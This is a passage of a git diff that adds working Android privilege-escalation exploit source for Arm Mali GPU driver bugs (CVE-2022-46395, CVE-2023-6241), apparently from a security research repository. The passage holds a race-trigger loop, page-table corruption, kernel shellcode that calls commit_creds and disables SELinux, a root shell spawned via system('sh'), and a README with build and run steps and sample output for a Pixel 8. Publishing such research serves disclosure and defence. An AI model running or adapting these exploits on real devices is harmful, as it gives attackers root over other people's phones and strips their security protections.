(finished_reset_time.tv_sec < finished_fault_time.tv_sec) return; + if (finished_reset_time.tv_sec > finished_fault_time.tv_sec) { + success = 1; + return; + } + if (finished_reset_time.tv_sec == finished_fault_time.tv_sec) { + if (finished_reset_time.tv_nsec > finished_fault_time.tv_nsec) { + success = 1; + return; + } + } + return; +} + +void* softjob_reset(void* arg) { + uint64_t* arguments = (uint64_t*)arg; + uint64_t benchmark = arguments[1]; + struct timespec start_benchmark_time; + struct kbase_ioctl_soft_event_update update= {0}; + update.event = benchmark ? 0 : uevent + OFF; + update.new_status = 0; + + int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0)); + int tfd_dups[NR_WATCHES]; + for (int i=0; i> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + atom_number = write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, atom_number); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + //Call commit_creds to overwrite process credentials to gain root + atom_number = write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, atom_number); + return atom_number; +} + +int find_pgd(uint64_t* gpu_addr, int* index) { + int ret = -1; + for (int pg = 0; pg < CORRUPTED_COMMIT_SIZE; pg++) { + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = gpu_addr[pg * 0x1000/8 + i]; + if ((entry & 0x443) == 0x443) { + *index = i; + return pg; + } + } + } + return ret; +} + +uint64_t benchmark() { + uint64_t time = 0; + int num_average = 30; + uint64_t arguments[2]; + int benchmark_fd = open_dev(MALI); + setup_mali(benchmark_fd, 0); + void* tracking_page2 = setup_tracking_page(benchmark_fd); + arguments[0] = benchmark_fd; + arguments[1] = 1; + for (int i = 0; i < num_average; i++) { + softjob_reset(&(arguments[0])); + time += this_benchmark_time/100; + } + printf("benchmark_time %ld\n", time/num_average); + close(benchmark_fd); + return time/num_average; +} + +int trigger(int mali_fd2) { + + int mali_fd = open_dev(MALI); + setup_mali(mali_fd, 0); + void* tracking_page = setup_tracking_page(mali_fd); + + aio_context_t ctx = 0; + uint32_t nr_events = 128; + int ret = io_setup(nr_events, &ctx); + if (ret < 0) err(1, "io_setup error\n"); + char* anon_mapping = (char*)ctx; + + migrate_to_cpu(WAIT_CPU); + *(volatile char *)(anon_mapping + OFF) = TEST_ENT; + + + uint64_t this_addr = (uint64_t)anon_mapping; + uint64_t imported_address = mem_import(mali_fd, this_addr); + void *gpu_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, + MAP_SHARED, mali_fd, imported_address); + if (gpu_mapping == MAP_FAILED) { + err(1, "gpu mapping failed\n"); + } + uint64_t jc = map_resource_job(mali_fd, atom_number++, (uint64_t)gpu_mapping); + map_external_resource(mali_fd, (uint64_t)gpu_mapping); + release_resource_job(mali_fd, atom_number++, jc); + uevent = (uint64_t)gpu_mapping; + + if (io_destroy(ctx) < 0) err(1, "unable to destroy aio ctx\n"); + + pthread_t thread; + uint64_t args[2]; + args[0] = mali_fd; + args[1] = 0; + + pthread_create(&thread, NULL, &unmap_resources, (void*)&(args[0])); + pthread_t thread1; + pthread_create(&thread1, NULL, softjob_reset, (void*)&(args[0])); + struct sched_param sched_par = {0}; + pthread_join(thread1, NULL); + pthread_join(thread, NULL); + check_success(); + + if (success) { + LOG("finished reset: %ld fault: %ld %ld err %d read %d\n", finished_reset_time.tv_nsec, finished_fault_time.tv_nsec, finished_fault_time.tv_sec, error_code, g_initial_read); + + uint64_t alias_region = access_free_pages(mali_fd, mali_fd2, corrupted_region); + int index = 0; + int pg = find_pgd((uint64_t*)alias_region, &index); + if (pg != -1) { + LOG("found pgd at page %d\n", pg); + } else { + LOG("failed to find pgd, retry\n"); + success = 0; + need_reset_fd = 1; + close(mali_fd); + return 0; + } + uint64_t pgd = alias_region + pg * 0x1000; + atom_number = write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); + cleanup(mali_fd, pgd, atom_number++); + return 1; + } + close(mali_fd); + return 0; +} + +int reset_mali2(int prev) { + if (prev != -1) close(prev); + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + void* tracking_page2 = setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + return mali_fd2; +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + uint64_t counter = 0; + select_offset(); + int mali_fd2 = reset_mali2(-1); + benchmark_time = benchmark(); + while (!success) { + reset(); + int ret = trigger(mali_fd2); + counter++; + if (counter % 100 == 0) { + LOG("failed after %ld\n", counter); + } + if (counter % 300 == 0) { + benchmark_time = benchmark(); + } + if (!success && need_reset_fd) { + mali_fd2 = reset_mali2(mali_fd2); + } + if (ret == 1) system("sh"); + } + LOG("success after %ld\n", counter); +} diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c new file mode 100644 index 0000000..c696832 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c @@ -0,0 +1,160 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +#include "mem_write.h" +#include "mempool_utils.h" + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +static inline uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +static inline uint32_t hi32(uint64_t x) { + return x >> 32; +} + +static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +static uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) { + void* jc_region = map_gpu(mali_fd, 1, 1, false, 0); + struct MALI_JOB_HEADER jh = {0}; + jh.is_64b = true; + jh.type = MALI_JOB_TYPE_WRITE_VALUE; + + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; + payload.type = type; + payload.immediate_value = value; + payload.address = gpu_addr; + + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh); + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload); + uint32_t* section = (uint32_t*)jc_region; + struct base_jd_atom_v2 atom = {0}; + atom.jc = (uint64_t)jc_region; + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_CS; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + usleep(10000); +} + +uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + reserved_size * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); + } + usleep(300000); + } + } + } + return atom_number; +} + +uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number) { + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + return atom_number; +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h new file mode 100644 index 0000000..17bc0c5 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h @@ -0,0 +1,27 @@ +#ifndef MEM_WRITE_H +#define MEM_WRITE_H + +#include +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "midgard.h" +#include "log_utils.h" + +#define KERNEL_BASE 0x80000000 + +#define PAGE_SHIFT 12 + +#define OVERWRITE_INDEX 256 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group); + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code); + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type); + +uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number); + +uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number); + +int run_enforce(); +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c new file mode 100644 index 0000000..9a7f134 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c @@ -0,0 +1,61 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include + +#include "mempool_utils.h" + +#define POOL_SIZE 16384 + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed %d\n", i); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h new file mode 100644 index 0000000..4115669 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h @@ -0,0 +1,19 @@ +#ifndef MEMPOOL_UTILS_H +#define MEMPOOL_UTILS_H + +#include +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "log_utils.h" + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc); + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +uint64_t drain_mem_pool(int mali_fd); + +void release_mem_pool(int mali_fd, uint64_t drain); + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h b/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h new file mode 100644 index 0000000..e0ce432 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h @@ -0,0 +1,260 @@ +#ifndef MIDGARD_H +#define MIDGARD_H + +//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone + +#include +#include +#include +#include +#include +#include +#include + +#define pan_section_ptr(base, A, S) \ + ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET)) + +#define pan_section_pack(dst, A, S, name) \ + for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \ + *_loop_terminate = (void *) (dst); \ + __builtin_expect(_loop_terminate != NULL, 1); \ + ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \ + _loop_terminate = NULL; })) + + +static inline uint64_t +__gen_uint(uint64_t v, uint32_t start, uint32_t end) +{ +#ifndef NDEBUG + const int width = end - start + 1; + if (width < 64) { + const uint64_t max = (1ull << width) - 1; + assert(v <= max); + } +#endif + + return v << start; +} + +static inline uint64_t +__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) +{ + uint64_t val = 0; + const int width = end - start + 1; + const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 ); + + for (int byte = start / 8; byte <= end / 8; byte++) { + val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); + } + + return (val >> (start % 8)) & mask; +} + +enum mali_job_type { + MALI_JOB_TYPE_NOT_STARTED = 0, + MALI_JOB_TYPE_NULL = 1, + MALI_JOB_TYPE_WRITE_VALUE = 2, + MALI_JOB_TYPE_CACHE_FLUSH = 3, + MALI_JOB_TYPE_COMPUTE = 4, + MALI_JOB_TYPE_VERTEX = 5, + MALI_JOB_TYPE_GEOMETRY = 6, + MALI_JOB_TYPE_TILER = 7, + MALI_JOB_TYPE_FUSED = 8, + MALI_JOB_TYPE_FRAGMENT = 9, +}; + +enum mali_write_value_type { + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, +}; + + +struct MALI_WRITE_VALUE_JOB_PAYLOAD { + uint64_t address; + enum mali_write_value_type type; + uint64_t immediate_value; +}; + +struct MALI_JOB_HEADER { + uint32_t exception_status; + uint32_t first_incomplete_task; + uint64_t fault_pointer; + bool is_64b; + enum mali_job_type type; + bool barrier; + bool invalidate_cache; + bool suppress_prefetch; + bool enable_texture_mapper; + bool relax_dependency_1; + bool relax_dependency_2; + uint32_t index; + uint32_t dependency_1; + uint32_t dependency_2; + uint64_t next; +}; + + +static inline void +MALI_JOB_HEADER_pack(uint32_t * restrict cl, + const struct MALI_JOB_HEADER * restrict values) +{ + cl[ 0] = __gen_uint(values->exception_status, 0, 31); + cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31); + cl[ 2] = __gen_uint(values->fault_pointer, 0, 63); + cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32; + cl[ 4] = __gen_uint(values->is_64b, 0, 0) | + __gen_uint(values->type, 1, 7) | + __gen_uint(values->barrier, 8, 8) | + __gen_uint(values->invalidate_cache, 9, 9) | + __gen_uint(values->suppress_prefetch, 11, 11) | + __gen_uint(values->enable_texture_mapper, 12, 12) | + __gen_uint(values->relax_dependency_1, 14, 14) | + __gen_uint(values->relax_dependency_2, 15, 15) | + __gen_uint(values->index, 16, 31); + cl[ 5] = __gen_uint(values->dependency_1, 0, 15) | + __gen_uint(values->dependency_2, 16, 31); + cl[ 6] = __gen_uint(values->next, 0, 63); + cl[ 7] = __gen_uint(values->next, 0, 63) >> 32; +} + + +#define MALI_JOB_HEADER_LENGTH 32 +struct mali_job_header_packed { uint32_t opaque[8]; }; +static inline void +MALI_JOB_HEADER_unpack(const uint8_t * restrict cl, + struct MALI_JOB_HEADER * restrict values) +{ + if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n"); + values->exception_status = __gen_unpack_uint(cl, 0, 31); + values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63); + values->fault_pointer = __gen_unpack_uint(cl, 64, 127); + values->is_64b = __gen_unpack_uint(cl, 128, 128); + values->type = __gen_unpack_uint(cl, 129, 135); + values->barrier = __gen_unpack_uint(cl, 136, 136); + values->invalidate_cache = __gen_unpack_uint(cl, 137, 137); + values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139); + values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140); + values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142); + values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143); + values->index = __gen_unpack_uint(cl, 144, 159); + values->dependency_1 = __gen_unpack_uint(cl, 160, 175); + values->dependency_2 = __gen_unpack_uint(cl, 176, 191); + values->next = __gen_unpack_uint(cl, 192, 255); +} + +static inline const char * +mali_job_type_as_str(enum mali_job_type imm) +{ + switch (imm) { + case MALI_JOB_TYPE_NOT_STARTED: return "Not started"; + case MALI_JOB_TYPE_NULL: return "Null"; + case MALI_JOB_TYPE_WRITE_VALUE: return "Write value"; + case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush"; + case MALI_JOB_TYPE_COMPUTE: return "Compute"; + case MALI_JOB_TYPE_VERTEX: return "Vertex"; + case MALI_JOB_TYPE_GEOMETRY: return "Geometry"; + case MALI_JOB_TYPE_TILER: return "Tiler"; + case MALI_JOB_TYPE_FUSED: return "Fused"; + case MALI_JOB_TYPE_FRAGMENT: return "Fragment"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent) +{ + fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status); + fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task); + fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer); + fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false"); + fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type)); + fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false"); + fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false"); + fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false"); + fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false"); + fprintf(fp, "%*sIndex: %u\n", indent, "", values->index); + fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1); + fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2); + fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next); +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl, + const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + cl[ 0] = __gen_uint(values->address, 0, 63); + cl[ 1] = __gen_uint(values->address, 0, 63) >> 32; + cl[ 2] = __gen_uint(values->type, 0, 31); + cl[ 3] = 0; + cl[ 4] = __gen_uint(values->immediate_value, 0, 63); + cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32; +} + + +#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24 +#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0 + + +struct mali_write_value_job_payload_packed { uint32_t opaque[6]; }; +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl, + struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n"); + values->address = __gen_unpack_uint(cl, 0, 63); + values->type = __gen_unpack_uint(cl, 64, 95); + values->immediate_value = __gen_unpack_uint(cl, 128, 191); +} + +static inline const char * +mali_write_value_type_as_str(enum mali_write_value_type imm) +{ + switch (imm) { + case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter"; + case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp"; + case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent) +{ + fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address); + fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type)); + fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value); +} + +struct mali_write_value_job_packed { + uint32_t opaque[14]; +}; + +#define MALI_JOB_HEADER_header \ + .is_64b = true + +#define MALI_WRITE_VALUE_JOB_LENGTH 56 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32 + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/README.md b/SecurityExploits/Android/Mali/CVE_2023_6241/README.md new file mode 100644 index 0000000..52e34ce --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/README.md @@ -0,0 +1,40 @@ +## Exploit for CVE-2023-6241 + +The write up can be found [here](https://github.blog/2024-03-18-gaining-kernel-code-execution-on-an-mte-enabled-pixel-8). This is a bug in the Arm Mali kernel driver that I reported in November 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root. + +The exploit is tested on the Google Pixel 8 with the Novmember 2023 patch (`UD1A.231105.004`). It needs to be compiled with OpenCL and linked with the OpenCL library `libGLES_mali.so`. The library can be found in a Pixel 8 device in `vendor/lib64/egl/libGLES_mali.so` and the OpenCL header files can be found in the KhronosGroup's [OpenCL-headers repository](https://github.com/KhronosGroup/OpenCL-Headers). The specific header that I used was the [v2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17) version, although other versions should also work. For reference, I used the following command to compile with clang in ndk-26: + +``` +android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf +``` + +The exploit needs to be linked to `libGLES_mali.so`. This can be done by setting the `LD_LIBRARY_PATH` to `/vendor/lib64/egl`. The exploit rarely fails and even if it does, it does not normally corrupt or crash the system. So in case it fails, it can be rerun. If successful, it should disable SELinux and gain root. + +``` +shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_jit_csf +mali_fd 3 +corrupted_jit_addr 6000001000 +kernel success +kernel success +queue kernel +jit_grow addr 6000001000 +Size after grow: 22f6 +Final grow size: 23c7 +keep alive jit_addr 60023d1000 +Size after free: 21fd, trim_level 6 +writing to gpu_va 6002301000 +found reused page 5fffef6000, 0 +pgd entry found at index 0 40000899bbc443 +overwrite addr : 5ffff00b50 b50 +overwrite addr : 5fffb00b50 b50 +overwrite addr : 5fff900b50 b50 +overwrite addr : 5ffff00714 714 +overwrite addr : 5fffb00714 714 +overwrite addr : 5fff900714 714 +result 50 +clean up +``` + +When running the first time, the exploit sometimes stalls after printing the last `overwrite addr` message. If that happens (stalled for more than 10 seconds, though pausing for a few seconds is normal), then simply kill the exploit and rerun it. It should not stall the second time. + +To test it with MTE enabled, follow [these instructions](https://outflux.net/blog/archives/2023/10/26/enable-mte-on-pixel-8/) to enable kernel MTE. diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h b/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h new file mode 100644 index 0000000..30f6699 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h @@ -0,0 +1,16 @@ +#ifndef FIRMWARE_OFFSETS_H +#define FIRMWARE_OFFSETS_H + +#define AVC_DENY_2311 0x806b50 + +#define 